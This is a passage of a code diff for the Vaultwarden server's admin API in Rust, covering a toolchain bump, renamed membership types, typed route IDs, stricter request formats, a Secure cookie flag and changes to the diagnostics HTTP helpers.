</mask>
|
||||||
|
</g>
|
||||||
|
</g>
|
||||||
|
</svg>
|
||||||
|
After Width: | Height: | Size: 7.6 KiB |
@@ -1,4 +1,4 @@
|
|||||||
[toolchain]
|
[toolchain]
|
||||||
channel = "1.76.0"
|
channel = "1.88.0"
|
||||||
components = [ "rustfmt", "clippy" ]
|
components = [ "rustfmt", "clippy" ]
|
||||||
profile = "minimal"
|
profile = "minimal"
|
||||||
|
|||||||
341
src/api/admin.rs
341
src/api/admin.rs
@@ -1,4 +1,5 @@
|
|||||||
use once_cell::sync::Lazy;
|
use once_cell::sync::Lazy;
|
||||||
|
use reqwest::Method;
|
||||||
use serde::de::DeserializeOwned;
|
use serde::de::DeserializeOwned;
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
use std::env;
|
use std::env;
|
||||||
@@ -17,13 +18,14 @@ use crate::{
|
|||||||
core::{log_event, two_factor},
|
core::{log_event, two_factor},
|
||||||
unregister_push_device, ApiResult, EmptyResult, JsonResult, Notify,
|
unregister_push_device, ApiResult, EmptyResult, JsonResult, Notify,
|
||||||
},
|
},
|
||||||
auth::{decode_admin, encode_jwt, generate_admin_claims, ClientIp},
|
auth::{decode_admin, encode_jwt, generate_admin_claims, ClientIp, Secure},
|
||||||
config::ConfigBuilder,
|
config::ConfigBuilder,
|
||||||
db::{backup_database, get_sql_server_version, models::*, DbConn, DbConnType},
|
db::{backup_database, get_sql_server_version, models::*, DbConn, DbConnType},
|
||||||
error::{Error, MapResult},
|
error::{Error, MapResult},
|
||||||
|
http_client::make_http_request,
|
||||||
mail,
|
mail,
|
||||||
util::{
|
util::{
|
||||||
container_base_image, format_naive_datetime_local, get_display_size, get_reqwest_client,
|
container_base_image, format_naive_datetime_local, get_display_size, get_web_vault_version,
|
||||||
is_running_in_container, NumberOrString,
|
is_running_in_container, NumberOrString,
|
||||||
},
|
},
|
||||||
CONFIG, VERSION,
|
CONFIG, VERSION,
|
||||||
@@ -48,7 +50,7 @@ pub fn routes() -> Vec<Route> {
|
|||||||
disable_user,
|
disable_user,
|
||||||
enable_user,
|
enable_user,
|
||||||
remove_2fa,
|
remove_2fa,
|
||||||
update_user_org_type,
|
update_membership_type,
|
||||||
update_revision_users,
|
update_revision_users,
|
||||||
post_config,
|
post_config,
|
||||||
delete_config,
|
delete_config,
|
||||||
@@ -60,6 +62,7 @@ pub fn routes() -> Vec<Route> {
|
|||||||
diagnostics,
|
diagnostics,
|
||||||
get_diagnostics_config,
|
get_diagnostics_config,
|
||||||
resend_user_invite,
|
resend_user_invite,
|
||||||
|
get_diagnostics_http,
|
||||||
]
|
]
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -96,9 +99,10 @@ const DT_FMT: &str = "%Y-%m-%d %H:%M:%S %Z";
|
|||||||
const BASE_TEMPLATE: &str = "admin/base";
|
const BASE_TEMPLATE: &str = "admin/base";
|
||||||
|
|
||||||
const ACTING_ADMIN_USER: &str = "vaultwarden-admin-00000-000000000000";
|
const ACTING_ADMIN_USER: &str = "vaultwarden-admin-00000-000000000000";
|
||||||
|
pub const FAKE_ADMIN_UUID: &str = "00000000-0000-0000-0000-000000000000";
|
||||||
|
|
||||||
fn admin_path() -> String {
|
fn admin_path() -> String {
|
||||||
format!("{}{}", CONFIG.domain_path(), ADMIN_PATH)
|
format!("{}{ADMIN_PATH}", CONFIG.domain_path())
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Debug)]
|
#[derive(Debug)]
|
||||||
@@ -167,8 +171,13 @@ struct LoginForm {
|
|||||||
redirect: Option<String>,
|
redirect: Option<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/", data = "<data>")]
|
#[post("/", format = "application/x-www-form-urlencoded", data = "<data>")]
|
||||||
fn post_admin_login(data: Form<LoginForm>, cookies: &CookieJar<'_>, ip: ClientIp) -> Result<Redirect, AdminResponse> {
|
fn post_admin_login(
|
||||||
|
data: Form<LoginForm>,
|
||||||
|
cookies: &CookieJar<'_>,
|
||||||
|
ip: ClientIp,
|
||||||
|
secure: Secure,
|
||||||
|
) -> Result<Redirect, AdminResponse> {
|
||||||
let data = data.into_inner();
|
let data = data.into_inner();
|
||||||
let redirect = data.redirect;
|
let redirect = data.redirect;
|
||||||
|
|
||||||
@@ -190,13 +199,14 @@ fn post_admin_login(data: Form<LoginForm>, cookies: &CookieJar<'_>, ip: ClientIp
|
|||||||
|
|
||||||
let cookie = Cookie::build((COOKIE_NAME, jwt))
|
let cookie = Cookie::build((COOKIE_NAME, jwt))
|
||||||
.path(admin_path())
|
.path(admin_path())
|
||||||
.max_age(rocket::time::Duration::minutes(CONFIG.admin_session_lifetime()))
|
.max_age(time::Duration::minutes(CONFIG.admin_session_lifetime()))
|
||||||
.same_site(SameSite::Strict)
|
.same_site(SameSite::Strict)
|
||||||
.http_only(true);
|
.http_only(true)
|
||||||
|
.secure(secure.https);
|
||||||
|
|
||||||
cookies.add(cookie);
|
cookies.add(cookie);
|
||||||
if let Some(redirect) = redirect {
|
if let Some(redirect) = redirect {
|
||||||
Ok(Redirect::to(format!("{}{}", admin_path(), redirect)))
|
Ok(Redirect::to(format!("{}{redirect}", admin_path())))
|
||||||
} else {
|
} else {
|
||||||
Err(AdminResponse::Ok(render_admin_page()))
|
Err(AdminResponse::Ok(render_admin_page()))
|
||||||
}
|
}
|
||||||
@@ -265,21 +275,21 @@ fn admin_page_login() -> ApiResult<Html<String>> {
|
|||||||
render_admin_login(None, None)
|
render_admin_login(None, None)
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize, Debug)]
|
#[derive(Debug, Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct InviteData {
|
struct InviteData {
|
||||||
email: String,
|
email: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
async fn get_user_or_404(uuid: &str, conn: &mut DbConn) -> ApiResult<User> {
|
async fn get_user_or_404(user_id: &UserId, conn: &mut DbConn) -> ApiResult<User> {
|
||||||
if let Some(user) = User::find_by_uuid(uuid, conn).await {
|
if let Some(user) = User::find_by_uuid(user_id, conn).await {
|
||||||
Ok(user)
|
Ok(user)
|
||||||
} else {
|
} else {
|
||||||
err_code!("User doesn't exist", Status::NotFound.code);
|
err_code!("User doesn't exist", Status::NotFound.code);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/invite", data = "<data>")]
|
#[post("/invite", format = "application/json", data = "<data>")]
|
||||||
async fn invite_user(data: Json<InviteData>, _token: AdminToken, mut conn: DbConn) -> JsonResult {
|
async fn invite_user(data: Json<InviteData>, _token: AdminToken, mut conn: DbConn) -> JsonResult {
|
||||||
let data: InviteData = data.into_inner();
|
let data: InviteData = data.into_inner();
|
||||||
if User::find_by_mail(&data.email, &mut conn).await.is_some() {
|
if User::find_by_mail(&data.email, &mut conn).await.is_some() {
|
||||||
@@ -290,7 +300,9 @@ async fn invite_user(data: Json<InviteData>, _token: AdminToken, mut conn: DbCon
|
|||||||
|
|
||||||
async fn _generate_invite(user: &User, conn: &mut DbConn) -> EmptyResult {
|
async fn _generate_invite(user: &User, conn: &mut DbConn) -> EmptyResult {
|
||||||
if CONFIG.mail_enabled() {
|
if CONFIG.mail_enabled() {
|
||||||
mail::send_invite(&user.email, &user.uuid, None, None, &CONFIG.invitation_org_name(), None).await
|
let org_id: OrganizationId = FAKE_ADMIN_UUID.to_string().into();
|
||||||
|
let member_id: MembershipId = FAKE_ADMIN_UUID.to_string().into();
|
||||||
|
mail::send_invite(user, org_id, member_id, &CONFIG.invitation_org_name(), None).await
|
||||||
} else {
|
} else {
|
||||||
let invitation = Invitation::new(&user.email);
|
let invitation = Invitation::new(&user.email);
|
||||||
invitation.save(conn).await
|
invitation.save(conn).await
|
||||||
@@ -303,7 +315,7 @@ async fn invite_user(data: Json<InviteData>, _token: AdminToken, mut conn: DbCon
|
|||||||
Ok(Json(user.to_json(&mut conn).await))
|
Ok(Json(user.to_json(&mut conn).await))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/test/smtp", data = "<data>")]
|
#[post("/test/smtp", format = "application/json", data = "<data>")]
|
||||||
async fn test_smtp(data: Json<InviteData>, _token: AdminToken) -> EmptyResult {
|
async fn test_smtp(data: Json<InviteData>, _token: AdminToken) -> EmptyResult {
|
||||||
let data: InviteData = data.into_inner();
|
let data: InviteData = data.into_inner();
|
||||||
|
|
||||||
@@ -326,9 +338,9 @@ async fn get_users_json(_token: AdminToken, mut conn: DbConn) -> Json<Value> {
|
|||||||
let mut users_json = Vec::with_capacity(users.len());
|
let mut users_json = Vec::with_capacity(users.len());
|
||||||
for u in users {
|
for u in users {
|
||||||
let mut usr = u.to_json(&mut conn).await;
|
let mut usr = u.to_json(&mut conn).await;
|
||||||
usr["UserEnabled"] = json!(u.enabled);
|
usr["userEnabled"] = json!(u.enabled);
|
||||||
usr["CreatedAt"] = json!(format_naive_datetime_local(&u.created_at, DT_FMT));
|
usr["createdAt"] = json!(format_naive_datetime_local(&u.created_at, DT_FMT));
|
||||||
usr["LastActive"] = match u.last_active(&mut conn).await {
|
usr["lastActive"] = match u.last_active(&mut conn).await {
|
||||||
Some(dt) => json!(format_naive_datetime_local(&dt, DT_FMT)),
|
Some(dt) => json!(format_naive_datetime_local(&dt, DT_FMT)),
|
||||||
None => json!(None::<String>),
|
None => json!(None::<String>),
|
||||||
};
|
};
|
||||||
@@ -364,37 +376,37 @@ async fn users_overview(_token: AdminToken, mut conn: DbConn) -> ApiResult<Html<
|
|||||||
async fn get_user_by_mail_json(mail: &str, _token: AdminToken, mut conn: DbConn) -> JsonResult {
|
async fn get_user_by_mail_json(mail: &str, _token: AdminToken, mut conn: DbConn) -> JsonResult {
|
||||||
if let Some(u) = User::find_by_mail(mail, &mut conn).await {
|
if let Some(u) = User::find_by_mail(mail, &mut conn).await {
|
||||||
let mut usr = u.to_json(&mut conn).await;
|
let mut usr = u.to_json(&mut conn).await;
|
||||||
usr["UserEnabled"] = json!(u.enabled);
|
usr["userEnabled"] = json!(u.enabled);
|
||||||
usr["CreatedAt"] = json!(format_naive_datetime_local(&u.created_at, DT_FMT));
|
usr["createdAt"] = json!(format_naive_datetime_local(&u.created_at, DT_FMT));
|
||||||
Ok(Json(usr))
|
Ok(Json(usr))
|
||||||
} else {
|
} else {
|
||||||
err_code!("User doesn't exist", Status::NotFound.code);
|
err_code!("User doesn't exist", Status::NotFound.code);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
#[get("/users/<uuid>")]
|
#[get("/users/<user_id>")]
|
||||||
async fn get_user_json(uuid: &str, _token: AdminToken, mut conn: DbConn) -> JsonResult {
|
async fn get_user_json(user_id: UserId, _token: AdminToken, mut conn: DbConn) -> JsonResult {
|
||||||
let u = get_user_or_404(uuid, &mut conn).await?;
|
let u = get_user_or_404(&user_id, &mut conn).await?;
|
||||||
let mut usr = u.to_json(&mut conn).await;
|
let mut usr = u.to_json(&mut conn).await;
|
||||||
usr["UserEnabled"] = json!(u.enabled);
|
usr["userEnabled"] = json!(u.enabled);
|
||||||
usr["CreatedAt"] = json!(format_naive_datetime_local(&u.created_at, DT_FMT));
|
usr["createdAt"] = json!(format_naive_datetime_local(&u.created_at, DT_FMT));
|
||||||
Ok(Json(usr))
|
Ok(Json(usr))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/users/<uuid>/delete")]
|
#[post("/users/<user_id>/delete", format = "application/json")]
|
||||||
async fn delete_user(uuid: &str, token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
async fn delete_user(user_id: UserId, token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
||||||
let user = get_user_or_404(uuid, &mut conn).await?;
|
let user = get_user_or_404(&user_id, &mut conn).await?;
|
||||||
|
|
||||||
// Get the user_org records before deleting the actual user
|
// Get the membership records before deleting the actual user
|
||||||
let user_orgs = UserOrganization::find_any_state_by_user(uuid, &mut conn).await;
|
let memberships = Membership::find_any_state_by_user(&user_id, &mut conn).await;
|
||||||
let res = user.delete(&mut conn).await;
|
let res = user.delete(&mut conn).await;
|
||||||
|
|
||||||
for user_org in user_orgs {
|
for membership in memberships {
|
||||||
log_event(
|
log_event(
|
||||||
EventType::OrganizationUserRemoved as i32,
|
EventType::OrganizationUserDeleted as i32,
|
||||||
&user_org.uuid,
|
&membership.uuid,
|
||||||
&user_org.org_uuid,
|
&membership.org_uuid,
|
||||||
ACTING_ADMIN_USER,
|
&ACTING_ADMIN_USER.into(),
|
||||||
14, // Use UnknownBrowser type
|
14, // Use UnknownBrowser type
|
||||||
&token.ip.ip,
|
&token.ip.ip,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
@@ -405,17 +417,17 @@ async fn delete_user(uuid: &str, token: AdminToken, mut conn: DbConn) -> EmptyRe
|
|||||||
res
|
res
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/users/<uuid>/deauth")]
|
#[post("/users/<user_id>/deauth", format = "application/json")]
|
||||||
async fn deauth_user(uuid: &str, _token: AdminToken, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
|
async fn deauth_user(user_id: UserId, _token: AdminToken, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
|
||||||
let mut user = get_user_or_404(uuid, &mut conn).await?;
|
let mut user = get_user_or_404(&user_id, &mut conn).await?;
|
||||||
|
|
||||||
nt.send_logout(&user, None).await;
|
nt.send_logout(&user, None, &mut conn).await;
|
||||||
|
|
||||||
if CONFIG.push_enabled() {
|
if CONFIG.push_enabled() {
|
||||||
for device in Device::find_push_devices_by_user(&user.uuid, &mut conn).await {
|
for device in Device::find_push_devices_by_user(&user.uuid, &mut conn).await {
|
||||||
match unregister_push_device(device.push_uuid).await {
|
match unregister_push_device(&device.push_uuid).await {
|
||||||
Ok(r) => r,
|
Ok(r) => r,
|
||||||
Err(e) => error!("Unable to unregister devices from Bitwarden server: {}", e),
|
Err(e) => error!("Unable to unregister devices from Bitwarden server: {e}"),
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -426,47 +438,49 @@ async fn deauth_user(uuid: &str, _token: AdminToken, mut conn: DbConn, nt: Notif
|
|||||||
user.save(&mut conn).await
|
user.save(&mut conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/users/<uuid>/disable")]
|
#[post("/users/<user_id>/disable", format = "application/json")]
|
||||||
async fn disable_user(uuid: &str, _token: AdminToken, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
|
async fn disable_user(user_id: UserId, _token: AdminToken, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
|
||||||
let mut user = get_user_or_404(uuid, &mut conn).await?;
|
let mut user = get_user_or_404(&user_id, &mut conn).await?;
|
||||||
Device::delete_all_by_user(&user.uuid, &mut conn).await?;
|
Device::delete_all_by_user(&user.uuid, &mut conn).await?;
|
||||||
user.reset_security_stamp();
|
user.reset_security_stamp();
|
||||||
user.enabled = false;
|
user.enabled = false;
|
||||||
|
|
||||||
let save_result = user.save(&mut conn).await;
|
let save_result = user.save(&mut conn).await;
|
||||||
|
|
||||||
nt.send_logout(&user, None).await;
|
nt.send_logout(&user, None, &mut conn).await;
|
||||||
|
|
||||||
save_result
|
save_result
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/users/<uuid>/enable")]
|
#[post("/users/<user_id>/enable", format = "application/json")]
|
||||||
async fn enable_user(uuid: &str, _token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
async fn enable_user(user_id: UserId, _token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
||||||
let mut user = get_user_or_404(uuid, &mut conn).await?;
|
let mut user = get_user_or_404(&user_id, &mut conn).await?;
|
||||||
user.enabled = true;
|
user.enabled = true;
|
||||||
|
|
||||||
user.save(&mut conn).await
|
user.save(&mut conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/users/<uuid>/remove-2fa")]
|
#[post("/users/<user_id>/remove-2fa", format = "application/json")]
|
||||||
async fn remove_2fa(uuid: &str, token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
async fn remove_2fa(user_id: UserId, token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
||||||
let mut user = get_user_or_404(uuid, &mut conn).await?;
|
let mut user = get_user_or_404(&user_id, &mut conn).await?;
|
||||||
TwoFactor::delete_all_by_user(&user.uuid, &mut conn).await?;
|
TwoFactor::delete_all_by_user(&user.uuid, &mut conn).await?;
|
||||||
two_factor::enforce_2fa_policy(&user, ACTING_ADMIN_USER, 14, &token.ip.ip, &mut conn).await?;
|
two_factor::enforce_2fa_policy(&user, &ACTING_ADMIN_USER.into(), 14, &token.ip.ip, &mut conn).await?;
|
||||||
user.totp_recover = None;
|
user.totp_recover = None;
|
||||||
user.save(&mut conn).await
|
user.save(&mut conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/users/<uuid>/invite/resend")]
|
#[post("/users/<user_id>/invite/resend", format = "application/json")]
|
||||||
async fn resend_user_invite(uuid: &str, _token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
async fn resend_user_invite(user_id: UserId, _token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
||||||
if let Some(user) = User::find_by_uuid(uuid, &mut conn).await {
|
if let Some(user) = User::find_by_uuid(&user_id, &mut conn).await {
|
||||||
//TODO: replace this with user.status check when it will be available (PR#3397)
|
//TODO: replace this with user.status check when it will be available (PR#3397)
|
||||||
if !user.password_hash.is_empty() {
|
if !user.password_hash.is_empty() {
|
||||||
err_code!("User already accepted invitation", Status::BadRequest.code);
|
err_code!("User already accepted invitation", Status::BadRequest.code);
|
||||||
}
|
}
|
||||||
|
|
||||||
if CONFIG.mail_enabled() {
|
if CONFIG.mail_enabled() {
|
||||||
mail::send_invite(&user.email, &user.uuid, None, None, &CONFIG.invitation_org_name(), None).await
|
let org_id: OrganizationId = FAKE_ADMIN_UUID.to_string().into();
|
||||||
|
let member_id: MembershipId = FAKE_ADMIN_UUID.to_string().into();
|
||||||
|
mail::send_invite(&user, org_id, member_id, &CONFIG.invitation_org_name(), None).await
|
||||||
} else {
|
} else {
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
@@ -475,42 +489,45 @@ async fn resend_user_invite(uuid: &str, _token: AdminToken, mut conn: DbConn) ->
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize, Debug)]
|
#[derive(Debug, Deserialize)]
|
||||||
struct UserOrgTypeData {
|
struct MembershipTypeData {
|
||||||
user_type: NumberOrString,
|
user_type: NumberOrString,
|
||||||
user_uuid: String,
|
user_uuid: UserId,
|
||||||
org_uuid: String,
|
org_uuid: OrganizationId,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/users/org_type", data = "<data>")]
|
#[post("/users/org_type", format = "application/json", data = "<data>")]
|
||||||
async fn update_user_org_type(data: Json<UserOrgTypeData>, token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
async fn update_membership_type(data: Json<MembershipTypeData>, token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
||||||
let data: UserOrgTypeData = data.into_inner();
|
let data: MembershipTypeData = data.into_inner();
|
||||||
|
|
||||||
let mut user_to_edit =
|
let Some(mut member_to_edit) = Membership::find_by_user_and_org(&data.user_uuid, &data.org_uuid, &mut conn).await
|
||||||
match UserOrganization::find_by_user_and_org(&data.user_uuid, &data.org_uuid, &mut conn).await {
|
else {
|
||||||
Some(user) => user,
|
err!("The specified user isn't member of the organization")
|
||||||
None => err!("The specified user isn't member of the organization"),
|
};
|
||||||
};
|
|
||||||
|
|
||||||
let new_type = match UserOrgType::from_str(&data.user_type.into_string()) {
|
let new_type = match MembershipType::from_str(&data.user_type.into_string()) {
|
||||||
Some(new_type) => new_type as i32,
|
Some(new_type) => new_type as i32,
|
||||||
None => err!("Invalid type"),
|
None => err!("Invalid type"),
|
||||||
};
|
};
|
||||||
|
|
||||||
if user_to_edit.atype == UserOrgType::Owner && new_type != UserOrgType::Owner {
|
if member_to_edit.atype == MembershipType::Owner && new_type != MembershipType::Owner {
|
||||||
// Removing owner permission, check that there is at least one other confirmed owner
|
// Removing owner permission, check that there is at least one other confirmed owner
|
||||||
if UserOrganization::count_confirmed_by_org_and_type(&data.org_uuid, UserOrgType::Owner, &mut conn).await <= 1 {
|
if Membership::count_confirmed_by_org_and_type(&data.org_uuid, MembershipType::Owner, &mut conn).await <= 1 {
|
||||||
err!("Can't change the type of the last owner")
|
err!("Can't change the type of the last owner")
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// This check is also done at api::organizations::{accept_invite(), _confirm_invite, _activate_user(), edit_user()}, update_user_org_type
|
// This check is also done at api::organizations::{accept_invite, _confirm_invite, _activate_member, edit_member}, update_membership_type
|
||||||
// It returns different error messages per function.
|
// It returns different error messages per function.
|
||||||
if new_type < UserOrgType::Admin {
|
if new_type < MembershipType::Admin {
|
||||||
match OrgPolicy::is_user_allowed(&user_to_edit.user_uuid, &user_to_edit.org_uuid, true, &mut conn).await {
|
match OrgPolicy::is_user_allowed(&member_to_edit.user_uuid, &member_to_edit.org_uuid, true, &mut conn).await {
|
||||||
Ok(_) => {}
|
Ok(_) => {}
|
||||||
Err(OrgPolicyErr::TwoFactorMissing) => {
|
Err(OrgPolicyErr::TwoFactorMissing) => {
|
||||||
err!("You cannot modify this user to this type because it has no two-step login method activated");
|
if CONFIG.email_2fa_auto_fallback() {
|
||||||
|
two_factor::email::find_and_activate_email_2fa(&member_to_edit.user_uuid, &mut conn).await?;
|
||||||
|
} else {
|
||||||
|
err!("You cannot modify this user to this type because they have not setup 2FA");
|
||||||
|
}
|
||||||
}
|
}
|
||||||
Err(OrgPolicyErr::SingleOrgEnforced) => {
|
Err(OrgPolicyErr::SingleOrgEnforced) => {
|
||||||
err!("You cannot modify this user to this type because it is a member of an organization which forbids it");
|
err!("You cannot modify this user to this type because it is a member of an organization which forbids it");
|
||||||
@@ -520,20 +537,20 @@ async fn update_user_org_type(data: Json<UserOrgTypeData>, token: AdminToken, mu
|
|||||||
|
|
||||||
log_event(
|
log_event(
|
||||||
EventType::OrganizationUserUpdated as i32,
|
EventType::OrganizationUserUpdated as i32,
|
||||||
&user_to_edit.uuid,
|
&member_to_edit.uuid,
|
||||||
&data.org_uuid,
|
&data.org_uuid,
|
||||||
ACTING_ADMIN_USER,
|
&ACTING_ADMIN_USER.into(),
|
||||||
14, // Use UnknownBrowser type
|
14, // Use UnknownBrowser type
|
||||||
&token.ip.ip,
|
&token.ip.ip,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
)
|
)
|
||||||
.await;
|
.await;
|
||||||
|
|
||||||
user_to_edit.atype = new_type;
|
member_to_edit.atype = new_type;
|
||||||
user_to_edit.save(&mut conn).await
|
member_to_edit.save(&mut conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/users/update_revision")]
|
#[post("/users/update_revision", format = "application/json")]
|
||||||
async fn update_revision_users(_token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
async fn update_revision_users(_token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
||||||
User::update_all_revisions(&mut conn).await
|
User::update_all_revisions(&mut conn).await
|
||||||
}
|
}
|
||||||
@@ -544,7 +561,7 @@ async fn organizations_overview(_token: AdminToken, mut conn: DbConn) -> ApiResu
|
|||||||
let mut organizations_json = Vec::with_capacity(organizations.len());
|
let mut organizations_json = Vec::with_capacity(organizations.len());
|
||||||
for o in organizations {
|
for o in organizations {
|
||||||
let mut org = o.to_json();
|
let mut org = o.to_json();
|
||||||
org["user_count"] = json!(UserOrganization::count_by_org(&o.uuid, &mut conn).await);
|
org["user_count"] = json!(Membership::count_by_org(&o.uuid, &mut conn).await);
|
||||||
org["cipher_count"] = json!(Cipher::count_by_org(&o.uuid, &mut conn).await);
|
org["cipher_count"] = json!(Cipher::count_by_org(&o.uuid, &mut conn).await);
|
||||||
org["collection_count"] = json!(Collection::count_by_org(&o.uuid, &mut conn).await);
|
org["collection_count"] = json!(Collection::count_by_org(&o.uuid, &mut conn).await);
|
||||||
org["group_count"] = json!(Group::count_by_org(&o.uuid, &mut conn).await);
|
org["group_count"] = json!(Group::count_by_org(&o.uuid, &mut conn).await);
|
||||||
@@ -558,17 +575,12 @@ async fn organizations_overview(_token: AdminToken, mut conn: DbConn) -> ApiResu
|
|||||||
Ok(Html(text))
|
Ok(Html(text))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/organizations/<uuid>/delete")]
|
#[post("/organizations/<org_id>/delete", format = "application/json")]
|
||||||
async fn delete_organization(uuid: &str, _token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
async fn delete_organization(org_id: OrganizationId, _token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
||||||
let org = Organization::find_by_uuid(uuid, &mut conn).await.map_res("Organization doesn't exist")?;
|
let org = Organization::find_by_uuid(&org_id, &mut conn).await.map_res("Organization doesn't exist")?;
|
||||||
org.delete(&mut conn).await
|
org.delete(&mut conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
|
||||||
struct WebVaultVersion {
|
|
||||||
version: String,
|
|
||||||
}
|
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
struct GitRelease {
|
struct GitRelease {
|
||||||
tag_name: String,
|
tag_name: String,
|
||||||
@@ -579,36 +591,30 @@ struct GitCommit {
|
|||||||
sha: String,
|
sha: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
async fn get_json_api<T: DeserializeOwned>(url: &str) -> Result<T, Error> {
|
||||||
struct TimeApi {
|
Ok(make_http_request(Method::GET, url)?.send().await?.error_for_status()?.json::<T>().await?)
|
||||||
year: u16,
|
|
||||||
month: u8,
|
|
||||||
day: u8,
|
|
||||||
hour: u8,
|
|
||||||
minute: u8,
|
|
||||||
seconds: u8,
|
|
||||||
}
|
}
|
||||||
|
|
||||||
async fn get_json_api<T: DeserializeOwned>(url: &str) -> Result<T, Error> {
|
async fn get_text_api(url: &str) -> Result<String, Error> {
|
||||||
let json_api = get_reqwest_client();
|
Ok(make_http_request(Method::GET, url)?.send().await?.error_for_status()?.text().await?)
|
||||||
|
|
||||||
Ok(json_api.get(url).send().await?.error_for_status()?.json::<T>().await?)
|
|
||||||
}
|
}
|
||||||
|
|
||||||
async fn has_http_access() -> bool {
|
async fn has_http_access() -> bool {
|
||||||
let http_access = get_reqwest_client();
|
let Ok(req) = make_http_request(Method::HEAD, "https://github.com/dani-garcia/vaultwarden") else {
|
||||||
|
return false;
|
||||||
match http_access.head("https://github.com/dani-garcia/vaultwarden").send().await {
|
};
|
||||||
|
match req.send().await {
|
||||||
Ok(r) => r.status().is_success(),
|
Ok(r) => r.status().is_success(),
|
||||||
_ => false,
|
_ => false,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
use cached::proc_macro::cached;
|
use cached::proc_macro::cached;
|
||||||
/// Cache this function to prevent API call rate limit. Github only allows 60 requests per hour, and we use 3 here already.
|
/// Cache this function to prevent API call rate limit. Github only allows 60 requests per hour, and we use 3 here already
|
||||||
/// It will cache this function for 300 seconds (5 minutes) which should prevent the exhaustion of the rate limit.
|
/// It will cache this function for 600 seconds (10 minutes) which should prevent the exhaustion of the rate limit
|
||||||
#[cached(time = 300, sync_writes = true)]
|
/// Any cache will be lost if Vaultwarden is restarted
|
||||||
async fn get_release_info(has_http_access: bool, running_within_container: bool) -> (String, String, String) {
|
#[cached(time = 600, sync_writes = "default")]
|
||||||
|
async fn get_release_info(has_http_access: bool) -> (String, String, String) {
|
||||||
// If the HTTP Check failed, do not even attempt to check for new versions since we were not able to connect with github.com anyway.
|
// If the HTTP Check failed, do not even attempt to check for new versions since we were not able to connect with github.com anyway.
|
||||||
if has_http_access {
|
if has_http_access {
|
||||||
(
|
(
|
||||||
@@ -625,19 +631,13 @@ async fn get_release_info(has_http_access: bool, running_within_container: bool)
|
|||||||
}
|
}
|
||||||
_ => "-".to_string(),
|
_ => "-".to_string(),
|
||||||
},
|
},
|
||||||
// Do not fetch the web-vault version when running within a container.
|
// Do not fetch the web-vault version when running within a container
|
||||||
// The web-vault version is embedded within the container it self, and should not be updated manually
|
// The web-vault version is embedded within the container it self, and should not be updated manually
|
||||||
if running_within_container {
|
match get_json_api::<GitRelease>("https://api.github.com/repos/dani-garcia/bw_web_builds/releases/latest")
|
||||||
"-".to_string()
|
|
||||||
} else {
|
|
||||||
match get_json_api::<GitRelease>(
|
|
||||||
"https://api.github.com/repos/dani-garcia/bw_web_builds/releases/latest",
|
|
||||||
)
|
|
||||||
.await
|
.await
|
||||||
{
|
{
|
||||||
Ok(r) => r.tag_name.trim_start_matches('v').to_string(),
|
Ok(r) => r.tag_name.trim_start_matches('v').to_string(),
|
||||||
_ => "-".to_string(),
|
_ => "-".to_string(),
|
||||||
}
|
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
} else {
|
} else {
|
||||||
@@ -647,17 +647,18 @@ async fn get_release_info(has_http_access: bool, running_within_container: bool)
|
|||||||
|
|
||||||
async fn get_ntp_time(has_http_access: bool) -> String {
|
async fn get_ntp_time(has_http_access: bool) -> String {
|
||||||
if has_http_access {
|
if has_http_access {
|
||||||
if let Ok(ntp_time) = get_json_api::<TimeApi>("https://www.timeapi.io/api/Time/current/zone?timeZone=UTC").await
|
if let Ok(cf_trace) = get_text_api("https://cloudflare.com/cdn-cgi/trace").await {
|
||||||
{
|
for line in cf_trace.lines() {
|
||||||
return format!(
|
if let Some((key, value)) = line.split_once('=') {
|
||||||
